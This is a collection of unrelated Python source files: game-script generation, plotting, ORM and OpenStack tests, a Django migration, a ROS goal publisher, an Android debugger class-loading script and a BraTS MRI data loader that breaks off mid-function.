print(' ', f"({scene.Prefix()})", scene.Title())
scene = scene.Next()
print()
episode = episode.Next()
print()
for scene in Scenes:
scene.PrepareDialog(Dialogs, Snippets, Conditions, Instructions, Codes)
lines = scene.CreateRenpyScene()
if len(lines) > 0:
print(f"({scene.Prefix()}) {scene.Title()}")
print()
for line in lines:
print(line)
print()
for snippet in Snippets:
snippet.PrepareDialog(Dialogs, Snippets, Conditions, Instructions, Codes)
lines = snippet.CreateRenpyScene()
if len(lines) > 0:
print(f"({snippet.Prefix()}) {snippet.Title()}")
print()
for line in lines:
print(line)
print()
for scene in Scenes:
if len(scene.Images) > 0:
print(f"({scene.Prefix()}) {scene.Title()}")
for imagename in scene.Images:
print(imagename)
print()
for snippet in Snippets:
if len(snippet.Images) > 0:
print(f"({snippet.Prefix()}) {snippet.Title()}")
for imagename in snippet.Images:
print(imagename)
print()
print()
#-------------------------------------------------------------------------------
# write Rnpy code out to the specified file
if args.o != None:
f = open(args.o, "w")
# The code files
for scene in Scenes:
lines = scene.CreateRenpyScene()
if len(lines) > 0:
for line in lines:
f.write(f"{line}\n")
f.write("\n")
for snippet in Snippets:
lines = snippet.CreateRenpyScene()
if len(lines) > 0:
for line in lines:
f.write(f"{line}\n")
f.write("\n")
# List out the images needed
for scene in Scenes:
if len(scene.Images) > 0:
for imagename in scene.Images:
f.write(f"{imagename}\n")
f.write("\n")
for snippet in Snippets:
if len(snippet.Images) > 0:
for imagename in snippet.Images:
f.write(f"{imagename}\n")
f.write("\n")
f.close()
|
py | 1a3f75cbe34eb718ca742b3fb41404b1619b3fb8 | import os
os.system("uvicorn main:app --reload") |
py | 1a3f761b317fe13b8b320a698c7570416e42362d | from typing import Optional
from numbers import Number
import numpy as np
import pandas as pd
import plotly.express as px
import plotly.graph_objects as go
__all__ = [
'plot',
]
def plot(
df: pd.DataFrame,
*args,
zmin: Optional[Number] = None,
zmax: Optional[Number] = None,
**kwargs,
) -> go.Figure:
if zmin is None:
zmin = -1
if zmax is None:
zmax = 1
return px.imshow(get_lower_correlation_matrix(df), *args, zmin=zmin, zmax=zmax, **kwargs)
def get_lower_correlation_matrix(df: pd.DataFrame) -> pd.DataFrame:
correlation = df.corr()
return correlation.where(np.tril(np.ones(correlation.shape), k=-1).astype(bool))
|
py | 1a3f76c1cb52a245350c7d57afe6d31e12a97086 | import pytest
from sqlalchemy.exc import IntegrityError
from blitzdb import Document
from blitzdb.fields import CharField, ForeignKeyField, ManyToManyField
from ..conftest import _sql_backend, get_sql_engine
class DirectorAward(Document):
class Meta(Document.Meta):
autoregister = False
name = CharField(indexed=True)
director = ForeignKeyField('Director', backref='awards')
class Actor(Document):
class Meta(Document.Meta):
autoregister = False
name = CharField(indexed=True)
class Movie(Document):
class Meta(Document.Meta):
autoregister = False
director = ForeignKeyField('Director', backref='movies')
actors = ManyToManyField('Actor', backref='movies')
name = CharField(indexed=True)
class Director(Document):
class Meta(Document.Meta):
autoregister = False
name = CharField(indexed=True)
def _init_backend(backend):
backend.register(Actor)
backend.register(Movie)
backend.register(Director)
backend.register(DirectorAward)
backend.init_schema()
backend.create_schema()
ted_kotcheff = Director({'name': 'Ted Kotcheff'})
silvester_stallone = Actor({'name': 'Silvester Stallone'})
rambo = Movie({'name': 'Rambo I', 'actors': [silvester_stallone], 'director': ted_kotcheff})
oscar = DirectorAward({'name': 'Oscar', 'director': ted_kotcheff})
with backend.transaction():
backend.save(rambo)
backend.save(oscar)
@pytest.fixture
def cascade_backend(request):
engine = get_sql_engine()
backend = _sql_backend(request, engine, autodiscover_classes=False, ondelete='CASCADE')
_init_backend(backend)
return backend
@pytest.fixture
def nocascade_backend(request):
engine = get_sql_engine()
backend = _sql_backend(request, engine, autodiscover_classes=False, ondelete=None)
_init_backend(backend)
return backend
def test_foreign_key_delete_cascade(cascade_backend):
movie = cascade_backend.get(Movie, {})
director = cascade_backend.get(Director, {})
director.delete()
assert cascade_backend.filter(Actor, {})
assert not cascade_backend.filter(Director, {})
assert not cascade_backend.filter(Movie, {})
assert not cascade_backend.filter(DirectorAward, {})
def test_foreign_key_delete_nocascade(nocascade_backend):
movie = nocascade_backend.get(Movie, {})
actor = nocascade_backend.get(Actor, {})
director = nocascade_backend.get(Director, {})
with pytest.raises(IntegrityError):
director.delete()
assert actor in nocascade_backend.filter(Actor, {})
assert director in nocascade_backend.filter(Director, {})
assert movie in nocascade_backend.filter(Movie, {})
def test_many_to_many_delete_cascade(cascade_backend):
movie = cascade_backend.get(Movie, {})
actor = cascade_backend.get(Actor, {})
actor.delete()
assert not cascade_backend.filter(Actor, {})
assert cascade_backend.filter(Movie, {})
def test_many_to_many_delete_nocascade(nocascade_backend):
movie = nocascade_backend.get(Movie, {})
actor = nocascade_backend.get(Actor, {})
director = nocascade_backend.get(Director, {})
with pytest.raises(IntegrityError):
actor.delete()
assert actor in nocascade_backend.filter(Actor, {})
assert director in nocascade_backend.filter(Director, {})
assert movie in nocascade_backend.filter(Movie, {})
|
py | 1a3f76e9b233c61012ace9933073b81a881836c7 | # -*- coding: utf-8 -*-
# Generated by Django 1.9.7 on 2016-11-27 13:46
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('acp_calendar', '0002_load_holiday_type'),
]
operations = [
migrations.AddField(
model_name='acpholiday',
name='fiscal_year',
field=models.IntegerField(default=0, verbose_name='fiscal year'),
),
]
|
py | 1a3f76edc4f66b98ae0b6c9ecd90a1a1f2306947 | """Reducing Functions in Python
These are functions that recombine an iterable recursively, ending up with a single return value
Also called accumulators, aggregators, or folding functions
Example: Finding the maximum value in an iterable
a0, a1, a2, ..., aN-1
max(a, b) -> maximum of a and b
result = a0
result = max(result, a1)
result = max(result, a2)
...
result = max(result, an-1)
# max value in a0, a1, a2, ..., an-1
the special case of sequences
(i.e. we can use indexes to access elements in the sequence)
Using a loop
"""
l = [5, 8, 6, 10, 9]                            # result = 5
max_value = lambda a, b: a if a > b else b      # result = max(5, 8) = 8
def max_sequence(sequence):                     # result = max(8, 6) = 8
    result = sequence[0]                        # result = max(8, 10) = 10
    for e in sequence[1:]:                      # result = max(10, 9) = 10
        result = max_value(result, e)
    return result                               # result -> 10
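# The same left fold written with functools.reduce (illustrative alternative,
# not part of the original lesson code):
from functools import reduce
max_reduced = reduce(max_value, l)  # -> 10, same result as max_sequence(l)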
# Notice the sequence of steps:
# l = [5, 8, 6, 10, 9]
#     ^  |  |
#     |  |  |
#     5  |  |
#      \ |  |
#    max(5, 8)   |
#         8      |
#          \     |
#       max(8, 6) |
py | 1a3f77014d6512537fcb6347d3b30ebbac1bbfbd | from django.db import models
from django.utils.translation import gettext_lazy as _
from django.urls import reverse
class BaseModel(models.Model):
created_at = models.DateTimeField(auto_now_add=True)
updated_at = models.DateTimeField(auto_now=True)
class Meta:
abstract = True
|
py | 1a3f771c0ea151e6138fef721a2dd113170c544e | #!/usr/bin/env python
import socket
import sys
import rospy
from geometry_msgs.msg import Pose2D
# Create a TCP/IP socket
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# Bind the socket to the port
server_address = ('10.103.118.91', 8000)
print >>sys.stderr, 'starting up on %s port %s' % server_address
sock.bind(server_address)
# Listen for incoming connections
sock.listen(1)
pub = rospy.Publisher('/nav_goal', Pose2D, queue_size=10)
rospy.init_node('goal_publisher', anonymous=True)
rate = rospy.Rate(100) # 100hz
"""
starting up on 10.103.118.91 port 8000
waiting for a connection
connection from ('10.103.95.125', 43562)
received "{ "skill_name" : "Go_to","location": "water"}"
sending data back to the client
received ""
no more data from ('10.103.95.125', 43562)
waiting for a connection
"""
named_locations = {"door" : [-1, -1, 0], "water": [-2, -7, 0], "middle": [-1.5, -3, 0]}
def get_position_from_name(name):
try:
return named_locations[name.strip().lower()]
except:
return None
while True:
# Wait for a connection
print >>sys.stderr, 'waiting for a connection'
connection, client_address = sock.accept()
try:
print >>sys.stderr, 'connection from', client_address
# Receive the data in small chunks and retransmit it
while True:
data = connection.recv(4000)
if data:
name = data.split('"location": ')[1].replace("}", "").replace('"', '').strip()
print(name)
pos = get_position_from_name(name)
if pos is not None:
for _ in range(10):
pub.publish(*pos)
else:
print >>sys.stderr, 'no more data from', client_address
break
finally:
# Clean up the connection
connection.close() |
py | 1a3f775fcf3d94441ee73b8d80b556eae0ea6dd6 | # vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2012 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import random
from tempest.api.object_storage import base
from tempest.common.utils.data_utils import rand_name
from tempest import exceptions
from tempest.test import attr
from tempest.test import HTTP_SUCCESS
class AccountTest(base.BaseObjectTest):
@classmethod
def setUpClass(cls):
super(AccountTest, cls).setUpClass()
cls.containers = []
for i in xrange(ord('a'), ord('f') + 1):
name = rand_name(name='%s-' % chr(i))
cls.container_client.create_container(name)
cls.containers.append(name)
cls.containers_count = len(cls.containers)
@classmethod
def tearDownClass(cls):
cls.delete_containers(cls.containers)
super(AccountTest, cls).tearDownClass()
@attr(type='smoke')
def test_list_containers(self):
# list of all containers should not be empty
params = {'format': 'json'}
resp, container_list = \
self.account_client.list_account_containers(params=params)
self.assertIsNotNone(container_list)
container_names = [c['name'] for c in container_list]
for container_name in self.containers:
self.assertIn(container_name, container_names)
@attr(type='smoke')
def test_list_containers_with_limit(self):
# list containers one of them, half of them then all of them
for limit in (1, self.containers_count / 2, self.containers_count):
params = {'limit': limit}
resp, container_list = \
self.account_client.list_account_containers(params=params)
self.assertEqual(len(container_list), limit)
@attr(type='smoke')
def test_list_containers_with_marker(self):
# list containers using marker param
# first expect to get 0 container as we specified last
# the container as marker
# second expect to get the bottom half of the containers
params = {'marker': self.containers[-1]}
resp, container_list = \
self.account_client.list_account_containers(params=params)
self.assertEqual(len(container_list), 0)
params = {'marker': self.containers[self.containers_count / 2]}
resp, container_list = \
self.account_client.list_account_containers(params=params)
self.assertEqual(len(container_list), self.containers_count / 2 - 1)
@attr(type='smoke')
def test_list_containers_with_end_marker(self):
# list containers using end_marker param
# first expect to get 0 container as we specified first container as
# end_marker
# second expect to get the top half of the containers
params = {'end_marker': self.containers[0]}
resp, container_list = \
self.account_client.list_account_containers(params=params)
self.assertEqual(len(container_list), 0)
params = {'end_marker': self.containers[self.containers_count / 2]}
resp, container_list = \
self.account_client.list_account_containers(params=params)
self.assertEqual(len(container_list), self.containers_count / 2)
@attr(type='smoke')
def test_list_containers_with_limit_and_marker(self):
# list containers combining marker and limit param
        # results are always limited by the limit, whatever the marker
for marker in random.choice(self.containers):
limit = random.randint(0, self.containers_count - 1)
params = {'marker': marker,
'limit': limit}
resp, container_list = \
self.account_client.list_account_containers(params=params)
self.assertLessEqual(len(container_list), limit)
@attr(type='smoke')
def test_list_account_metadata(self):
# list all account metadata
resp, metadata = self.account_client.list_account_metadata()
self.assertIn(int(resp['status']), HTTP_SUCCESS)
self.assertIn('x-account-object-count', resp)
self.assertIn('x-account-container-count', resp)
self.assertIn('x-account-bytes-used', resp)
@attr(type='smoke')
def test_create_and_delete_account_metadata(self):
header = 'test-account-meta'
data = 'Meta!'
# add metadata to account
resp, _ = self.account_client.create_account_metadata(
metadata={header: data})
self.assertIn(int(resp['status']), HTTP_SUCCESS)
resp, _ = self.account_client.list_account_metadata()
self.assertIn('x-account-meta-' + header, resp)
self.assertEqual(resp['x-account-meta-' + header], data)
# delete metadata from account
resp, _ = \
self.account_client.delete_account_metadata(metadata=[header])
self.assertIn(int(resp['status']), HTTP_SUCCESS)
resp, _ = self.account_client.list_account_metadata()
self.assertNotIn('x-account-meta-' + header, resp)
@attr(type=['negative', 'gate'])
def test_list_containers_with_non_authorized_user(self):
# list containers using non-authorized user
# create user
self.data.setup_test_user()
resp, body = \
self.token_client.auth(self.data.test_user,
self.data.test_password,
self.data.test_tenant)
new_token = \
self.token_client.get_token(self.data.test_user,
self.data.test_password,
self.data.test_tenant)
custom_headers = {'X-Auth-Token': new_token}
params = {'format': 'json'}
# list containers with non-authorized user token
self.assertRaises(exceptions.Unauthorized,
self.custom_account_client.list_account_containers,
params=params, metadata=custom_headers)
# delete the user which was created
self.data.teardown_all()
|
py | 1a3f777399f5f9e1c756b1f294a7641eb0d0a184 | # Copyright 2015 Google Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest2
class TestConnection(unittest2.TestCase):
def _getTargetClass(self):
from gcloud.dns.connection import Connection
return Connection
def _makeOne(self, *args, **kw):
return self._getTargetClass()(*args, **kw)
def test_build_api_url_no_extra_query_params(self):
conn = self._makeOne()
URI = '/'.join([
conn.API_BASE_URL,
'dns',
conn.API_VERSION,
'foo',
])
self.assertEqual(conn.build_api_url('/foo'), URI)
def test_build_api_url_w_extra_query_params(self):
from six.moves.urllib.parse import parse_qsl
from six.moves.urllib.parse import urlsplit
conn = self._makeOne()
uri = conn.build_api_url('/foo', {'bar': 'baz'})
scheme, netloc, path, qs, _ = urlsplit(uri)
self.assertEqual('%s://%s' % (scheme, netloc), conn.API_BASE_URL)
self.assertEqual(path,
'/'.join(['', 'dns', conn.API_VERSION, 'foo']))
parms = dict(parse_qsl(qs))
self.assertEqual(parms['bar'], 'baz')
|
py | 1a3f78dbf1d8e0ee74ecd5c694f9651951f2ed27 | # LoadClass_arm.py is used to .... when the "ClassLinker::LoadClassMembers" method is invoked in 32-bit mode.
import gc
import os
import sys
from arm_ds.debugger_v1 import Debugger
from arm_ds.debugger_v1 import DebugException
import config
import memory
import mmu
from DexParser import header_item, string_id_item, type_id_item, class_def_item
# obtain current execution state
debugger = Debugger()
execution_state = debugger.getCurrentExecutionContext()
def retrieve_string_value(string_ptr):
length_val = memory.readMemory32(string_ptr + config.offset_string_length)
reference_ptr = memory.readMemory32(string_ptr + config.offset_string_reference)
char_array = memory.retrieve_char_array(reference_ptr)
return char_array
def start_prolog():
# disable the FindClass breakpoint
for idx in range(0, execution_state.getBreakpointService().getBreakpointCount()):
brk_object = execution_state.getBreakpointService().getBreakpoint(idx)
if (int(brk_object.getAddresses()[0]) & 0xffffffff) == config.brk_FindClass:
brk_object.disable()
def end_prolog_done():
# disable the FindClass breakpoint
for idx in range(0, execution_state.getBreakpointService().getBreakpointCount()):
brk_object = execution_state.getBreakpointService().getBreakpoint(idx)
if (int(brk_object.getAddresses()[0]) & 0xffffffff) == config.brk_FindClass:
brk_object.disable()
# disable the LoadMethod breakpoint
for idx in range(0, execution_state.getBreakpointService().getBreakpointCount()):
brk_object = execution_state.getBreakpointService().getBreakpoint(idx)
if (int(brk_object.getAddresses()[0]) & 0xffffffff) == config.brk_LoadMethod:
brk_object.disable()
def end_prolog():
# enable the FindClass breakpoint
for idx in range(0, execution_state.getBreakpointService().getBreakpointCount()):
brk_object = execution_state.getBreakpointService().getBreakpoint(idx)
if (int(brk_object.getAddresses()[0]) & 0xffffffff) == config.brk_FindClass:
brk_object.enable()
def cleanup():
if mmu.page_table is not None:
del mmu.page_table
gc.collect()
def FindClass():
# -- HEAD -- #
start_prolog()
# ensure that the LoadMethod breakpoint is enabled
for idx in range(0, execution_state.getBreakpointService().getBreakpointCount()):
brk_object = execution_state.getBreakpointService().getBreakpoint(idx)
if (int(brk_object.getAddresses()[0]) & 0xffffffff) == config.brk_LoadMethod:
brk_object.enable()
# -- BODY -- #
# get the "descriptor" parameter
descriptor_param = int(execution_state.getRegisterService().getValue("R2")) & 0xffffffff
descriptor_ptr = descriptor_param
# read the "descriptor" string
descriptor_string_val = memory.retrieve_char_array(descriptor_ptr)
print "[FindClass] descriptor = %s" % descriptor_string_val
if config.package_name.replace(".", "/") in descriptor_string_val:
force_loading(descriptor_string_val)
# -- TAIL -- #
end_prolog_done()
else:
# -- TAIL -- #
end_prolog()
# continue the execution of the target application
execution_state.getExecutionService().resume()
cleanup()
return
# continue the execution of the target application
execution_state.getExecutionService().resume()
cleanup()
return
def force_loading(exclude_class):
# save register values
origin_R0_val = int(execution_state.getRegisterService().getValue("R0")) & 0xffffffff
origin_R1_val = int(execution_state.getRegisterService().getValue("R1")) & 0xffffffff
origin_R2_val = int(execution_state.getRegisterService().getValue("R2")) & 0xffffffff
origin_R3_val = int(execution_state.getRegisterService().getValue("R3")) & 0xffffffff
origin_R12_val = int(execution_state.getRegisterService().getValue("R12")) & 0xffffffff
origin_SP_val = int(execution_state.getRegisterService().getValue("SP")) & 0xffffffff
origin_LR_val = int(execution_state.getRegisterService().getValue("LR")) & 0xffffffff
origin_CPSR_val = int(execution_state.getRegisterService().getValue("CPSR")) & 0xffffffff
page_size = 0x1000
page_vtl_start_address = origin_SP_val - (origin_SP_val % page_size)
print "[FindClass] origin SP = %0#10x" % origin_SP_val
print "[FindClass] origin page = %0#10x" % page_vtl_start_address
origin_content = execution_state.getMemoryService().read(page_vtl_start_address, page_size)
print origin_content
# retrieve dex_file_ptr and dex_file_size
fp = open(os.path.join(config.workspace, config.log_file), "r")
for range_info in fp.readlines():
range_info = range_info.replace("\n", "").strip()
if "[DexFile]" in range_info:
range_info = range_info.split(",")[0].split("=")[1].strip()
break
fp.close()
dex_file_begin_val = int(range_info.split(", ")[0], 16) & 0xffffffff
# retrieve loaded classes
loaded_classes = []
loaded_classes.append(exclude_class)
fp = open(os.path.join(config.workspace, config.log_file), "r")
for class_info in fp.readlines():
class_info = class_info.replace("\n", "").strip()
if "[LoadMethod] origin" in class_info:
class_info = class_info.split(";")[0].split(" ")[-1].strip()
class_info = class_info + ";"
print "[FindClass] loaded class = %s" % class_info
if not (class_info in loaded_classes):
loaded_classes.append(class_info)
fp.close()
# resolve
string_ids_off = header_item.get_string_ids_off(dex_file_begin_val)
type_ids_off = header_item.get_type_ids_off(dex_file_begin_val)
class_defs_size = header_item.get_class_defs_size(dex_file_begin_val)
class_defs_off = header_item.get_class_defs_off(dex_file_begin_val)
for class_def_idx in range(class_defs_size):
class_idx = class_def_item.get_class_idx(dex_file_begin_val, class_defs_off, class_def_idx)
class_descriptor_idx = type_id_item.get_descriptor_idx(dex_file_begin_val, type_ids_off, class_idx)
class_descriptor_content = string_id_item.get_string_id_item_data(dex_file_begin_val, string_ids_off, class_descriptor_idx)
if class_descriptor_content in loaded_classes:
continue
print "[FindClass] force descriptor = %s" % class_descriptor_content
# hook
execution_state.getRegisterService().setValue("R0", origin_R0_val)
execution_state.getRegisterService().setValue("R1", origin_R1_val)
descriptor_ptr = string_id_item.get_string_id_item_data_off(dex_file_begin_val, string_ids_off, class_descriptor_idx)
print "[FindClass] force descriptor address = %0#10x" % descriptor_ptr
execution_state.getRegisterService().setValue("R2", descriptor_ptr)
descriptor_content = string_id_item.get_string_id_item_data(dex_file_begin_val, string_ids_off, class_descriptor_idx)
print "[FindClass] force descriptor value = %s" % descriptor_content
hash = ComputeModifiedUtf8Hash(descriptor_content) & 0xffffffff
execution_state.getRegisterService().setValue("R3", hash)
execution_state.getRegisterService().setValue("R12", origin_R12_val)
execution_state.getRegisterService().setValue("SP", origin_SP_val)
execution_state.getRegisterService().setValue("LR", origin_LR_val)
execution_state.getRegisterService().setValue("CPSR", origin_CPSR_val)
execution_state.getMemoryService().write(page_vtl_start_address, origin_content)
# execute
execution_state.getExecutionService().resumeTo(config.brk_FindClass_end)
try:
execution_state.getExecutionService().waitForStop(10 * 60 * 1000) # wait for 10mins
except DebugException:
raise RuntimeError("wtf !!!")
execution_state.getRegisterService().setValue("PC", config.brk_FindClass)
# recover register values
execution_state.getRegisterService().setValue("R0", origin_R0_val)
execution_state.getRegisterService().setValue("R1", origin_R1_val)
execution_state.getRegisterService().setValue("R2", origin_R2_val)
execution_state.getRegisterService().setValue("R3", origin_R3_val)
execution_state.getRegisterService().setValue("R12", origin_R12_val)
execution_state.getRegisterService().setValue("SP", origin_SP_val)
execution_state.getRegisterService().setValue("LR", origin_LR_val)
execution_state.getRegisterService().setValue("CPSR", origin_CPSR_val)
post_content = execution_state.getMemoryService().read(page_vtl_start_address, page_size)
print post_content
execution_state.getMemoryService().write(page_vtl_start_address, origin_content)
# execute
execution_state.getExecutionService().resumeTo(config.brk_FindClass_end)
try:
execution_state.getExecutionService().waitForStop(10 * 60 * 1000) # wait for 10mins
except DebugException:
raise RuntimeError("wtf !!!")
def ComputeModifiedUtf8Hash(input):
hash = 0
input_bytes = bytes(input)
for idx in range(len(input_bytes)):
hash = hash * 31 + ord(input_bytes[idx])
return hash
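# Worked example (illustrative): this is the same 31-based polynomial as Java's
# String.hashCode, applied to the descriptor bytes. For a hypothetical
# descriptor "Lc;":
# ((0 * 31 + ord('L')) * 31 + ord('c')) * 31 + ord(';')
# = (76 * 31 + 99) * 31 + 59 = 2455 * 31 + 59 = 76164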
if __name__ == '__main__':
FindClass()
sys.exit()
|
py | 1a3f78fbe04dc9ac80fb262eec7682bf8bc404a8 | import os
import torch
import numpy as np
import SimpleITK as sitk
import random
from torch.utils.data import Dataset
class BraTS(Dataset):
def __init__(self, root, phase, desired_depth=128, desired_height=160, desired_width=192, normalize_flag=True,
scale_intensity_flag=False, shift_intesity_flag=False, flip_axes_flag=False):
self.root = root
self.patients = os.listdir(self.root)
self.patients = [x for x in self.patients if x.startswith('BraTS')]
self.flair_suffix = "_flair.nii.gz"
self.t1_suffix = "_t1.nii.gz"
self.t1ce_suffix = "_t1ce.nii.gz"
self.t2_suffix = "_t2.nii.gz"
self.seg_suffix = "_seg.nii.gz"
self.wt_suffix = "_contour_wt.nii.gz"
self.tc_suffix = "_contour_tc.nii.gz"
self.et_suffix = "_contour_et.nii.gz"
self.phase = phase
self.desired_depth = desired_depth
self.desired_height = desired_height
self.desired_width = desired_width
self.normalize_flag = normalize_flag
self.scale_intensity_flag = scale_intensity_flag
self.shift_intensity_flag = shift_intesity_flag
self.flip_axes_flag = flip_axes_flag
def __len__(self):
return len(self.patients)
def __getitem__(self, idx):
patient = self.patients[idx]
path_flair = os.path.join(self.root, patient, patient + self.flair_suffix)
path_t1 = os.path.join(self.root, patient, patient + self.t1_suffix)
path_t2 = os.path.join(self.root, patient, patient + self.t2_suffix)
path_t1ce = os.path.join(self.root, patient, patient + self.t1ce_suffix)
path_seg = os.path.join(self.root, patient, patient + self.seg_suffix)
path_contour_wt = os.path.join(self.root, patient, patient + self.wt_suffix)
path_contour_tc = os.path.join(self.root, patient, patient + self.tc_suffix)
path_contour_et = os.path.join(self.root, patient, patient + self.et_suffix)
mask, start_depth, start_height, start_width = self.get_mask_simple(path_seg)
out = self.get_volume(path_flair, path_t1, path_t2, path_t1ce, start_depth,
start_height, start_width)
contours = self.get_contours(path_contour_wt, path_contour_tc, path_contour_et, start_depth, start_height, start_width)
if self.flip_axes_flag:
dice = random.uniform(0, 1)
if dice > 0.5 and dice < 0.6:
mask = mask[:, ::-1, : , :].copy()
out = out[:, ::-1, : , :].copy()
contours = contours[:, ::-1, : , :].copy()
elif dice > 0.6 and dice < 0.7:
mask = mask[:, :, ::-1 , :].copy()
out = out[:, :, ::-1 , :].copy()
contours = contours[:, :, ::-1 , :].copy()
elif dice > 0.7 and dice < 0.8:
mask = mask[:, :, : , ::-1].copy()
out = out[:, :, : , ::-1].copy()
contours = contours[:, :, : , ::-1].copy()
elif dice > 0.8 and dice < 0.9:
mask = mask[:, :, ::-1 , ::-1].copy()
out = out[:, :, ::-1 , ::-1].copy()
contours = contours[:, :, ::-1 , ::-1].copy()
elif dice > 0.9 and dice < 1:
mask = mask[:, ::-1, ::-1 , ::-1].copy()
out = out[:, ::-1, ::-1 , ::-1].copy()
contours = contours[:, ::-1, ::-1 , ::-1].copy()
return torch.FloatTensor(out), torch.FloatTensor(mask), torch.FloatTensor(contours), patient
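    # Illustrative usage (not part of the dataset class): the path and
    # parameters below are placeholders.
    # train_set = BraTS('/data/BraTS/train', phase='train', flip_axes_flag=True)
    # loader = torch.utils.data.DataLoader(train_set, batch_size=1, shuffle=True)
    # volume, mask, contours, patient = next(iter(loader))
    # # volume: (1, 4, D, H, W); mask and contours: (1, 3, D, H, W)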
def get_contours(self, path_contour_wt, path_contour_tc, path_contour_et, start_depth, start_height, start_width):
depth = self.desired_depth
height = self.desired_height
width = self.desired_width
try:
contour_wt = sitk.GetArrayFromImage(sitk.ReadImage(path_contour_wt))[start_depth: start_depth + depth, start_height: start_height + height, start_width: start_width + width]
except Exception as e:
return np.zeros((self.desired_depth, self.desired_height, self.desired_width))
try:
contour_tc = sitk.GetArrayFromImage(sitk.ReadImage(path_contour_tc))[start_depth: start_depth + depth, start_height: start_height + height, start_width: start_width + width]
except Exception as e:
return np.zeros((self.desired_depth, self.desired_height, self.desired_width))
try:
contour_et = sitk.GetArrayFromImage(sitk.ReadImage(path_contour_et))[start_depth: start_depth + depth, start_height: start_height + height, start_width: start_width + width]
except Exception as e:
return np.zeros((self.desired_depth, self.desired_height, self.desired_width))
return np.stack((contour_wt, contour_tc, contour_et))
def normalize_one_volume(self, volume):
new_volume = np.zeros(volume.shape)
location = np.where(volume != 0)
mean = np.mean(volume[location])
var = np.std(volume[location])
new_volume[location] = (volume[location] - mean) / var
return new_volume
def merge_volumes(self, *volumes):
return np.stack(volumes, axis=0)
def shift_intensity(self, volume):
location = np.where(volume != 0)
minimum = np.min(volume[location])
maximum = np.max(volume[location])
std = np.std(volume[location])
value = np.random.uniform(low=-0.1 * std, high=0.1 * std, size=1)
volume[location] += value
        # chained fancy indexing assigns to a temporary copy, so clip explicitly
        volume[location] = np.clip(volume[location], minimum, maximum)
return volume
def scale_intensity(self, volume):
location = np.where(volume != 0)
new_volume = np.zeros(volume.shape)
IntensityScale = np.random.uniform(0.9, 1, 1)
new_volume[location] = volume[location] * IntensityScale
return new_volume
def crop_volume(self, volume, start_depth, start_height, start_width):
### initial volumes are 155 X 240 X 240
depth = self.desired_depth
height = self.desired_height
width = self.desired_width
return volume[:, start_depth: start_depth + depth, start_height: start_height + height, start_width: start_width + width]
def get_volume(self, path_flair, path_t1, path_t2, path_t1ce, start_depth, start_height, start_width):
flair = sitk.GetArrayFromImage(sitk.ReadImage(path_flair))
t1 = sitk.GetArrayFromImage(sitk.ReadImage(path_t1))
t2 = sitk.GetArrayFromImage(sitk.ReadImage(path_t2))
t1ce = sitk.GetArrayFromImage(sitk.ReadImage(path_t1ce))
if self.desired_depth > 155:
flair = np.concatenate([flair, np.zeros((self.desired_depth - 155, 240, 240))], axis=0)
t1 = np.concatenate([t1, np.zeros((self.desired_depth - 155, 240, 240))], axis=0)
t2 = np.concatenate([t2, np.zeros((self.desired_depth - 155, 240, 240))], axis=0)
t1ce = np.concatenate([t1ce, np.zeros((self.desired_depth - 155, 240, 240))], axis=0)
if self.scale_intensity_flag:
flair = self.scale_intensity(flair)
t1 = self.scale_intensity(t1)
t2 = self.scale_intensity(t2)
t1ce = self.scale_intensity(t1ce)
if self.shift_intensity_flag:
flair = self.shift_intensity(flair)
t1 = self.shift_intensity(t1)
t2 = self.shift_intensity(t2)
t1ce = self.shift_intensity(t1ce)
if self.normalize_flag == True:
out = self.merge_volumes(self.normalize_one_volume(flair), self.normalize_one_volume(t2), self.normalize_one_volume(t1ce),
self.normalize_one_volume(t1))
else:
out = self.merge_volumes(flair, t2, t1ce, t1)
out = self.crop_volume(out, start_depth, start_height, start_width)
return out
def get_mask_simple(self, path_seg):
try:
seg = sitk.GetArrayFromImage(sitk.ReadImage(path_seg))
except Exception as e:
seg = np.zeros((155, 240, 240))
desired_depth = self.desired_depth
desired_height = self.desired_height
desired_width = self.desired_width
if desired_depth <= 155:
start_depth = np.random.randint(0, 156 - desired_depth)
to_add = 0
else:
start_depth = 0
to_add = desired_depth - 155
desired_depth = 155
start_height = np.random.randint(0, 241 - desired_height)
start_width = np.random.randint(0, 241 - desired_width)
end_depth = start_depth + desired_depth
end_height = start_height + desired_height
end_width = start_width + desired_width
if to_add != 0:
pad_seg = np.zeros((to_add, end_height - start_height, end_width - start_width))
new_seg = seg[start_depth: end_depth, start_height: end_height, start_width: end_width]
if to_add != 0:
new_seg = np.concatenate([new_seg, pad_seg], axis=0)
        # Convert the BraTS label map into three nested binary channels:
        # channel 0 = whole tumor (any non-zero label), channel 1 = tumor core
        # (labels 1 and 4), channel 2 = enhancing tumor (label 4).
        final_seg = np.zeros((3, ) + new_seg.shape)
        final_seg[0, :, :, :][np.where(new_seg != 0)] = 1
        final_seg[1, :, :, :][np.where((new_seg == 4) | (new_seg == 1))] = 1
        final_seg[2, :, :, :][np.where(new_seg == 4)] = 1
return final_seg, start_depth, start_height, start_width
def get_mask(self, path_seg):
seg = sitk.GetArrayFromImage(sitk.ReadImage(path_seg))
location = np.where(seg != 0)
min_depth, max_depth = np.min(location[0]), np.max(location[0])
min_height, max_height = np.min(location[1]), np.max(location[1])
min_width, max_width = np.min(location[2]), np.max(location[2])
desired_depth = self.desired_depth
desired_height = self.desired_height
desired_width = self.desired_width
new_volume = np.zeros((desired_depth, desired_height, desired_width))
difference_depth = max_depth - min_depth
difference_height = max_height - min_height
difference_width = max_width - min_width
if difference_depth < desired_depth:
start_depth = np.random.randint(min_depth // 2, min_depth)
end_depth = min(start_depth + desired_depth, 155)
if end_depth == 155:
